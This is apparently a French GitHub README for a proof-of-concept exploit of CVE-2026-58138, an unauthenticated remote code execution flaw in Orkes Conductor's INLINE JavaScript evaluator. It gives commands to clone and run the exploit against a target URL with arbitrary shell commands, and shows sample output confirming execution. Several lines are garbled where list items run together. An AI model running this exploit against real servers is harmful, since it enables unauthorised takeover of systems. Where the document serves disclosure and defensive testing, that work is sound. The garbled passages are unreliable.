
CVE-2026-58138 - Conductor (3.21.21..<3.30.2) RCE non authentifié via l'évaluateur GraalVM INLINE
Vulnérabilité critique d'exécution de code à distance dans Orkes Conductor
CVE-2026-58138 est une vulnérabilité critique d'exécution de code à distance (RCE) non authentifiée affectant Orkes Conductor versions 3.21.21 à 3.30.1. Cette vulnérabilité permet à un attaquant d'exécuter des commandes arbitraires sur le serveur Conductor sans nécessiter d'authentification, pouvant conduire à une compromission complète du système.
La vulnérabilité existe dans le type de tâche INLINE du moteur de workflows d'Orkes Conductor. La tâche INLINE prend en charge l'évaluation JavaScript avec accès aux objets Java via eval, permettant à un attaquant de :
INLINE avec du code JavaScriptjava.lang.Runtime.exec()| Plage de versions | Statut |
|---|---|
| 3.21.21 - 3.30.1 | ✅ Vulnérable |
| > 3.30.1 | ❌ Corrigé |
# Clone the repository
git clone https://github.com/0xgh057r3c0n/CVE-2026-58138.git
cd CVE-2026-58138
# Make the script executable
chmod +x CVE-2026-58138.py
# Verify installation
python3 CVE-2026-58138.py --help
# Basic usage
python3 CVE-2026-58138.py http://target:8080
# Custom command
python3 CVE-2026-58138.py http://target:8080 -c "whoami; id"
[>] Orkes Conductor 3.21.21 - 3.30.1 Remote Code Execution
[>] Author: 0xgh057r3c0n
[>] CVE-2026-58138 Unauthenticated RCE PoC
[*] target = http://192.168.1.100:8080
[*] command = 'id; hostname'
[+] workflow 'pwn_1742345678' registered (HTTP 200)
[+] started workflow id = 123e4567-e89b-12d3-a456-426614174000
[+] UNAUTHENTICATED RCE CONFIRMED – command output:
uid=1000(conductor) gid=1000(conductor) groups=1000(conductor)
conductor-server-6b7c8d9e0f-abc12
3.30.2 ou ultérieurINLINE s'il n'est pas nécessaireÀ des fins éducatives et de recherche en sécurité uniquement. Utilisez uniquement sur des systèmes dont vous êtes propriétaire ou pour lesquels vous avez une autorisation explicite de test.
⭐ Vous avez trouvé cela utile ? Donnez-lui une étoile sur GitHub ⭐